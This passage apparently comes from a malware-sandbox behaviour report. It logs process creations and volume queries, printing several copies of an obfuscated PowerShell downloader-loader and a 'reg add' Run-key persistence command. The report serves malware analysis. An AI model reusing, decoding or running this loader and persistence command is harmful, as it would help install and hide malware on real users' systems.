t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%chansonens% -w 1 $hypokonderens=(get-itemproperty -path 'hkcu:\oversigtslisterne\').incharity;%chansonens% ($hypokonderens)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%chansonens% -w 1 $hypokonderens=(get-itemproperty -path 'hkcu:\oversigtslisterne\').incharity;%chansonens% ($hypokonderens)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
